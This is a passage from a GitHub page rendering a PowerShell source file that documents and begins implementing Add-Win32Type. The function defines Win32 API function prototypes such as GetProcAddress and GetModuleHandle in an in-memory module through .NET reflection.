id=\"LC171\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    The return type of the function.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L172\" class=\"blob-num js-line-number\" data-line-number=\"172\"></td>\n        <td id=\"LC172\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L173\" class=\"blob-num js-line-number\" data-line-number=\"173\"></td>\n        <td id=\"LC173\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">PARAMETER</span> <span class=\"pl-k\">ParameterTypes</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L174\" class=\"blob-num js-line-number\" data-line-number=\"174\"></td>\n        <td id=\"LC174\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L175\" class=\"blob-num js-line-number\" data-line-number=\"175\"></td>\n        <td id=\"LC175\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    The function parameters.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L176\" class=\"blob-num js-line-number\" data-line-number=\"176\"></td>\n        <td id=\"LC176\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L177\" class=\"blob-num js-line-number\" data-line-number=\"177\"></td>\n        <td id=\"LC177\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">PARAMETER</span> <span class=\"pl-k\">NativeCallingConvention</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L178\" class=\"blob-num js-line-number\" data-line-number=\"178\"></td>\n        <td id=\"LC178\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L179\" class=\"blob-num js-line-number\" data-line-number=\"179\"></td>\n        <td id=\"LC179\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Specifies the native calling convention of the function. Defaults to</span></td>\n      </tr>\n      <tr>\n        <td id=\"L180\" class=\"blob-num js-line-number\" data-line-number=\"180\"></td>\n        <td id=\"LC180\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    stdcall.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L181\" class=\"blob-num js-line-number\" data-line-number=\"181\"></td>\n        <td id=\"LC181\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L182\" class=\"blob-num js-line-number\" data-line-number=\"182\"></td>\n        <td id=\"LC182\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">PARAMETER</span> <span class=\"pl-k\">Charset</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L183\" class=\"blob-num js-line-number\" data-line-number=\"183\"></td>\n        <td id=\"LC183\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L184\" class=\"blob-num js-line-number\" data-line-number=\"184\"></td>\n        <td id=\"LC184\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    If you need to explicitly call an &#39;A&#39; or &#39;W&#39; Win32 function, you can</span></td>\n      </tr>\n      <tr>\n        <td id=\"L185\" class=\"blob-num js-line-number\" data-line-number=\"185\"></td>\n        <td id=\"LC185\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    specify the character set.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L186\" class=\"blob-num js-line-number\" data-line-number=\"186\"></td>\n        <td id=\"LC186\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L187\" class=\"blob-num js-line-number\" data-line-number=\"187\"></td>\n        <td id=\"LC187\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">PARAMETER</span> <span class=\"pl-k\">SetLastError</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L188\" class=\"blob-num js-line-number\" data-line-number=\"188\"></td>\n        <td id=\"LC188\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L189\" class=\"blob-num js-line-number\" data-line-number=\"189\"></td>\n        <td id=\"LC189\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Indicates whether the callee calls the SetLastError Win32 API</span></td>\n      </tr>\n      <tr>\n        <td id=\"L190\" class=\"blob-num js-line-number\" data-line-number=\"190\"></td>\n        <td id=\"LC190\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    function before returning from the attributed method.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L191\" class=\"blob-num js-line-number\" data-line-number=\"191\"></td>\n        <td id=\"LC191\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L192\" class=\"blob-num js-line-number\" data-line-number=\"192\"></td>\n        <td id=\"LC192\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">PARAMETER</span> <span class=\"pl-k\">Module</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L193\" class=\"blob-num js-line-number\" data-line-number=\"193\"></td>\n        <td id=\"LC193\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L194\" class=\"blob-num js-line-number\" data-line-number=\"194\"></td>\n        <td id=\"LC194\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    The in-memory module that will host the functions. Use</span></td>\n      </tr>\n      <tr>\n        <td id=\"L195\" class=\"blob-num js-line-number\" data-line-number=\"195\"></td>\n        <td id=\"LC195\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    New-InMemoryModule to define an in-memory module.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L196\" class=\"blob-num js-line-number\" data-line-number=\"196\"></td>\n        <td id=\"LC196\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L197\" class=\"blob-num js-line-number\" data-line-number=\"197\"></td>\n        <td id=\"LC197\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">PARAMETER</span> <span class=\"pl-k\">Namespace</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L198\" class=\"blob-num js-line-number\" data-line-number=\"198\"></td>\n        <td id=\"LC198\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L199\" class=\"blob-num js-line-number\" data-line-number=\"199\"></td>\n        <td id=\"LC199\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    An optional namespace to prepend to the type. Add-Win32Type defaults</span></td>\n      </tr>\n      <tr>\n        <td id=\"L200\" class=\"blob-num js-line-number\" data-line-number=\"200\"></td>\n        <td id=\"LC200\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    to a namespace consisting only of the name of the DLL.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L201\" class=\"blob-num js-line-number\" data-line-number=\"201\"></td>\n        <td id=\"LC201\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L202\" class=\"blob-num js-line-number\" data-line-number=\"202\"></td>\n        <td id=\"LC202\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">EXAMPLE</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L203\" class=\"blob-num js-line-number\" data-line-number=\"203\"></td>\n        <td id=\"LC203\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L204\" class=\"blob-num js-line-number\" data-line-number=\"204\"></td>\n        <td id=\"LC204\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    $Mod = New-InMemoryModule -ModuleName Win32</span></td>\n      </tr>\n      <tr>\n        <td id=\"L205\" class=\"blob-num js-line-number\" data-line-number=\"205\"></td>\n        <td id=\"LC205\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L206\" class=\"blob-num js-line-number\" data-line-number=\"206\"></td>\n        <td id=\"LC206\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    $FunctionDefinitions = @(</span></td>\n      </tr>\n      <tr>\n        <td id=\"L207\" class=\"blob-num js-line-number\" data-line-number=\"207\"></td>\n        <td id=\"LC207\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">      (func kernel32 GetProcAddress ([IntPtr]) @([IntPtr], [String]) -Charset Ansi -SetLastError),</span></td>\n      </tr>\n      <tr>\n        <td id=\"L208\" class=\"blob-num js-line-number\" data-line-number=\"208\"></td>\n        <td id=\"LC208\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">      (func kernel32 GetModuleHandle ([Intptr]) @([String]) -SetLastError),</span></td>\n      </tr>\n      <tr>\n        <td id=\"L209\" class=\"blob-num js-line-number\" data-line-number=\"209\"></td>\n        <td id=\"LC209\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">      (func ntdll RtlGetCurrentPeb ([IntPtr]) @())</span></td>\n      </tr>\n      <tr>\n        <td id=\"L210\" class=\"blob-num js-line-number\" data-line-number=\"210\"></td>\n        <td id=\"LC210\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    )</span></td>\n      </tr>\n      <tr>\n        <td id=\"L211\" class=\"blob-num js-line-number\" data-line-number=\"211\"></td>\n        <td id=\"LC211\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L212\" class=\"blob-num js-line-number\" data-line-number=\"212\"></td>\n        <td id=\"LC212\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    $Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace &#39;Win32&#39;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L213\" class=\"blob-num js-line-number\" data-line-number=\"213\"></td>\n        <td id=\"LC213\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    $Kernel32 = $Types[&#39;kernel32&#39;]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L214\" class=\"blob-num js-line-number\" data-line-number=\"214\"></td>\n        <td id=\"LC214\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    $Ntdll = $Types[&#39;ntdll&#39;]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L215\" class=\"blob-num js-line-number\" data-line-number=\"215\"></td>\n        <td id=\"LC215\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    $Ntdll::RtlGetCurrentPeb()</span></td>\n      </tr>\n      <tr>\n        <td id=\"L216\" class=\"blob-num js-line-number\" data-line-number=\"216\"></td>\n        <td id=\"LC216\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    $ntdllbase = $Kernel32::GetModuleHandle(&#39;ntdll&#39;)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L217\" class=\"blob-num js-line-number\" data-line-number=\"217\"></td>\n        <td id=\"LC217\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    $Kernel32::GetProcAddress($ntdllbase, &#39;RtlGetCurrentPeb&#39;)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L218\" class=\"blob-num js-line-number\" data-line-number=\"218\"></td>\n        <td id=\"LC218\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L219\" class=\"blob-num js-line-number\" data-line-number=\"219\"></td>\n        <td id=\"LC219\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">NOTES</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L220\" class=\"blob-num js-line-number\" data-line-number=\"220\"></td>\n        <td id=\"LC220\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L221\" class=\"blob-num js-line-number\" data-line-number=\"221\"></td>\n        <td id=\"LC221\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Inspired by Lee Holmes&#39; Invoke-WindowsApi http://poshcode.org/2189</span></td>\n      </tr>\n      <tr>\n        <td id=\"L222\" class=\"blob-num js-line-number\" data-line-number=\"222\"></td>\n        <td id=\"LC222\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L223\" class=\"blob-num js-line-number\" data-line-number=\"223\"></td>\n        <td id=\"LC223\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    When defining multiple function prototypes, it is ideal to provide</span></td>\n      </tr>\n      <tr>\n        <td id=\"L224\" class=\"blob-num js-line-number\" data-line-number=\"224\"></td>\n        <td id=\"LC224\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Add-Win32Type with an array of function signatures. That way, they</span></td>\n      </tr>\n      <tr>\n        <td id=\"L225\" class=\"blob-num js-line-number\" data-line-number=\"225\"></td>\n        <td id=\"LC225\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    are all incorporated into the same in-memory module.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L226\" class=\"blob-num js-line-number\" data-line-number=\"226\"></td>\n        <td id=\"LC226\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    #&gt;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L227\" class=\"blob-num js-line-number\" data-line-number=\"227\"></td>\n        <td id=\"LC227\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L228\" class=\"blob-num js-line-number\" data-line-number=\"228\"></td>\n        <td id=\"LC228\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-ent\">[OutputTyp<span class=\"pl-ent\">e</span></span><span class=\"pl-e\">([<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Hashtable</span><span class=\"pl-smi\">]</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L229\" class=\"blob-num js-line-number\" data-line-number=\"229\"></td>\n        <td id=\"LC229\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">Param</span><span class=\"pl-k\">(</span></td>\n      </tr>\n      <tr>\n        <td id=\"L230\" class=\"blob-num js-line-number\" data-line-number=\"230\"></td>\n        <td id=\"LC230\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Mandatory</span> =<span class=\"pl-smi\"> $True</span></span></span>, <span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">ValueFromPipelineByPropertyName</span> =<span class=\"pl-smi\"> $True</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L231\" class=\"blob-num js-line-number\" data-line-number=\"231\"></td>\n        <td id=\"LC231\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[String]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L232\" class=\"blob-num js-line-number\" data-line-number=\"232\"></td>\n        <td id=\"LC232\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">DllName</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L233\" class=\"blob-num js-line-number\" data-line-number=\"233\"></td>\n        <td id=\"LC233\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L234\" class=\"blob-num js-line-number\" data-line-number=\"234\"></td>\n        <td id=\"LC234\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Mandatory</span> =<span class=\"pl-smi\"> $True</span></span></span>, <span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">ValueFromPipelineByPropertyName</span> =<span class=\"pl-smi\"> $True</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L235\" class=\"blob-num js-line-number\" data-line-number=\"235\"></td>\n        <td id=\"LC235\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[String]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L236\" class=\"blob-num js-line-number\" data-line-number=\"236\"></td>\n        <td id=\"LC236\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">FunctionName</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L237\" class=\"blob-num js-line-number\" data-line-number=\"237\"></td>\n        <td id=\"LC237\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L238\" class=\"blob-num js-line-number\" data-line-number=\"238\"></td>\n        <td id=\"LC238\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Mandatory</span> =<span class=\"pl-smi\"> $True</span></span></span>, <span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">ValueFromPipelineByPropertyName</span> =<span class=\"pl-smi\"> $True</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L239\" class=\"blob-num js-line-number\" data-line-number=\"239\"></td>\n        <td id=\"LC239\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Type]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L240\" class=\"blob-num js-line-number\" data-line-number=\"240\"></td>\n        <td id=\"LC240\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">ReturnType</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L241\" class=\"blob-num js-line-number\" data-line-number=\"241\"></td>\n        <td id=\"LC241\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L242\" class=\"blob-num js-line-number\" data-line-number=\"242\"></td>\n        <td id=\"LC242\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">ValueFromPipelineByPropertyName</span> =<span class=\"pl-smi\"> $True</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L243\" class=\"blob-num js-line-number\" data-line-number=\"243\"></td>\n        <td id=\"LC243\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Type[]]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L244\" class=\"blob-num js-line-number\" data-line-number=\"244\"></td>\n        <td id=\"LC244\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">ParameterTypes</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L245\" class=\"blob-num js-line-number\" data-line-number=\"245\"></td>\n        <td id=\"LC245\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L246\" class=\"blob-num js-line-number\" data-line-number=\"246\"></td>\n        <td id=\"LC246\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">ValueFromPipelineByPropertyName</span> =<span class=\"pl-smi\"> $True</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L247\" class=\"blob-num js-line-number\" data-line-number=\"247\"></td>\n        <td id=\"LC247\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Runtime.InteropServices.CallingConvention]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L248\" class=\"blob-num js-line-number\" data-line-number=\"248\"></td>\n        <td id=\"LC248\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">NativeCallingConvention</span> <span class=\"pl-k\">=</span> <span class=\"pl-e\">[Runtime.InteropServices.CallingConvention]</span>::StdCall<span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L249\" class=\"blob-num js-line-number\" data-line-number=\"249\"></td>\n        <td id=\"LC249\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L250\" class=\"blob-num js-line-number\" data-line-number=\"250\"></td>\n        <td id=\"LC250\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">ValueFromPipelineByPropertyName</span> =<span class=\"pl-smi\"> $True</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L251\" class=\"blob-num js-line-number\" data-line-number=\"251\"></td>\n        <td id=\"LC251\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Runtime.InteropServices.CharSet]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L252\" class=\"blob-num js-line-number\" data-line-number=\"252\"></td>\n        <td id=\"LC252\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">Charset</span> <span class=\"pl-k\">=</span> <span class=\"pl-e\">[Runtime.InteropServices.CharSet]</span>::Auto<span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L253\" class=\"blob-num js-line-number\" data-line-number=\"253\"></td>\n        <td id=\"LC253\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L254\" class=\"blob-num js-line-number\" data-line-number=\"254\"></td>\n        <td id=\"LC254\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">ValueFromPipelineByPropertyName</span> =<span class=\"pl-smi\"> $True</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L255\" class=\"blob-num js-line-number\" data-line-number=\"255\"></td>\n        <td id=\"LC255\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Switch]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L256\" class=\"blob-num js-line-number\" data-line-number=\"256\"></td>\n        <td id=\"LC256\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">SetLastError</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L257\" class=\"blob-num js-line-number\" data-line-number=\"257\"></td>\n        <td id=\"LC257\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L258\" class=\"blob-num js-line-number\" data-line-number=\"258\"></td>\n        <td id=\"LC258\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Mandatory</span> =<span class=\"pl-smi\"> $True</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L259\" class=\"blob-num js-line-number\" data-line-number=\"259\"></td>\n        <td id=\"LC259\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[ValidateScrip<span class=\"pl-ent\">t</span></span><span class=\"pl-e\">({(<span class=\"pl-k\">$</span><span class=\"pl-c1\">_</span> -<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">is</span> <span class=\"pl-smi\">[Reflection.Emit.ModuleBuilder]</span></span></span>)</span> -or <span class=\"pl-e\">(<span class=\"pl-k\">$</span><span class=\"pl-c1\">_</span> -<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">is</span> <span class=\"pl-smi\">[Reflection.Assembly]</span></span></span>)</span>})<span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L260\" class=\"blob-num js-line-number\" data-line-number=\"260\"></td>\n        <td id=\"LC260\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">Module</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L261\" class=\"blob-num js-line-number\" data-line-number=\"261\"></td>\n        <td id=\"LC261\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L262\" class=\"blob-num js-line-number\" data-line-number=\"262\"></td>\n        <td id=\"LC262\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[ValidateNotNul<span class=\"pl-ent\">l</span></span><span class=\"pl-e\">()</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L263\" class=\"blob-num js-line-number\" data-line-number=\"263\"></td>\n        <td id=\"LC263\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[String]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L264\" class=\"blob-num js-line-number\" data-line-number=\"264\"></td>\n        <td id=\"LC264\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">Namespace</span> <span class=\"pl-k\">=</span> <span class=\"pl-s\">&#39;&#39;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L265\" class=\"blob-num js-line-number\" data-line-number=\"265\"></td>\n        <td id=\"LC265\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L266\" class=\"blob-num js-line-number\" data-line-number=\"266\"></td>\n        <td id=\"LC266\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L267\" class=\"blob-num js-line-number\" data-line-number=\"267\"></td>\n        <td id=\"LC267\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">BEGIN</span></td>\n      </tr>\n      <tr>\n        <td id=\"L268\" class=\"blob-num js-line-number\" data-line-number=\"268\"></td>\n        <td id=\"LC268\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L269\" class=\"blob-num js-line-number\" data-line-number=\"269\"></td>\n        <td id=\"LC269\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">TypeHash</span> <span class=\"pl-k\">=</span> @{}</td>\n      </tr>\n      <tr>\n        <td id=\"L270\" class=\"blob-num js-line-number\" data-line-number=\"270\"></td>\n        <td id=\"LC270\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L271\" class=\"blob-num js-line-number\" data-line-number=\"271\"></td>\n        <td id=\"LC271\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L272\" class=\"blob-num js-line-number\" data-line-number=\"272\"></td>\n        <td id=\"LC272\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">PROCESS</span></td>\n      </tr>\n      <tr>\n        <td id=\"L273\" class=\"blob-num js-line-number\" data-line-number=\"273\"></td>\n        <td id=\"LC273\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L274\" class=\"blob-num js-line-number\" data-line-number=\"274\"></td>\n        <td id=\"LC274\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">if</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Module</span> <span class=\"pl-k\">-is</span> <span class=\"pl-e\">[Reflection.Assembly]</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L275\" class=\"blob-num js-line-number\" data-line-number=\"275\"></td>\n        <td id=\"LC275\" class=\"blob-code blob-code-inner js-file-line\">            {</td>\n      </tr>\n      <tr>\n        <td id=\"L276\" class=\"blob-num js-line-number\" data-line-number=\"276\"></td>\n        <td id=\"LC276\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">if</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span 